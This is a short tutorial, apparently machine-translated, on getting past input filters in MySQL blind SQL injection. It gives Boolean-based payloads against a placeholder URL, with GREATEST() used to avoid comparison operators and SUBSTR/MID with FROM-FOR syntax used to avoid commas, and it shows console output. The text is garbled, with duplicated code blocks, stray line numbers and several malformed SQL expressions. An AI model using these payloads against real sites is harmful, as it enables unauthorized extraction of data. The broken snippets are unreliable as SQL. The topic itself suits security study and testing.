There are more bypass techniques for SQL injections, and this article only makes a few simple summaries.
The best use of the injection point:
Support Union
Can error
Additional benefits such as multi-line execution, executable system commands, HTTP request, etc. are supported
If this is not the case, brute force guessing may be required. When you are guessing, you may encounter some limitations. All the attackers have to do is break them up.
1. Use the greatest function to bypass the case of a size-to-symbol
When you are guessing a single character, you typically use binary to find it.
Mysql> Select ASCII (Mid (User (), n)) < 150;
+------------------------------+
| ASCII (Mid (User (), +)) < 150 |
+------------------------------+
| 1 |
+------------------------------+
1
2
3
4
5
6
Mysql> Select ASCII (Mid (User (), n)) < 150;
+------------------------------+
| ASCII (Mid (User (), +)) < 150 |
+------------------------------+
| 1 |
+------------------------------+
The above is to determine whether the ASCII code of the first character of user () is less than 150. Returns True (1) if it is less than 150, otherwise false (0) is returned. You can see that you need to use the size to symbol.
For example, for a Boolean based injection. Try:
Http://xxx.com/index.php?id=1 and ASCII (Mid (User (),)) < 150
Http://xxx.com/index.php?id=1 and ASCII (Mid (User (), >=) 150
The content returned by the above two pages should be different.
But the problem is, in some cases, we can't use the size-to-symbol (<>), which is filtered.
At this point, you can bypass the greatest function. Greatest (A, b), which returns the larger of the number in a and.
When we want to guess whether the ASCII code for the first character of user () is less than or equal to 150, use:
Mysql> Select Greatest (ASCII (User (), 1, 1), 150) = 150;
+------------------------------------------+
| Greatest (ASCII (User (), 1, 1), 150) =150 |
+------------------------------------------+
| 1 |
+------------------------------------------+
1
2
3
4
5
6
Mysql> Select Greatest (ASCII (User (), 1, 1), 150) = 150;
+------------------------------------------+
| Greatest (ASCII (User (), 1, 1), 150) =150 |
+------------------------------------------+
| 1 |
+------------------------------------------+
If it is less than 150, the above return value is true.
2. Use the SUBSTR function to bypass the case where commas cannot be used
There are fewer cases where commas are not possible, often because commas have certain special effects and are handled separately.
Usually, the guess is to use a comma, because the mid function takes the character na:
ASCII (Mid (User (), 1, 1)) =150
1
ASCII (Mid (User (), 1, 1)) =150
The method to bypass is to use from X for Y. Similar syntax:
Mid (User () from 1 for 1)
Or
substr (User () from 1 for 1)
1
2
3
Mid (User () from 1 for 1)
Or
substr (User () from 1 for 1)
The above also starts with the first character and takes one character.
Then, without a comma-injected syntax, it can become:
Mysql> Select ASCII (substr (User () from 1 for 1)) < 150;
+------------------------------------------+
| ASCII (substr (User () from 1 for 1)) < 150 |
+------------------------------------------+
| 1 |
+------------------------------------------+
Mysql> Select ASCII (substr (User () from 1 for 1)) < 150;
+------------------------------------------+
| ASCII (substr (User () from 1 for 1)) < 150 |
+------------------------------------------+
| 1 |
+------------------------------------------+
is not the same as the mid function, and does not use a comma.
Filter bypass techniques for MySQL injections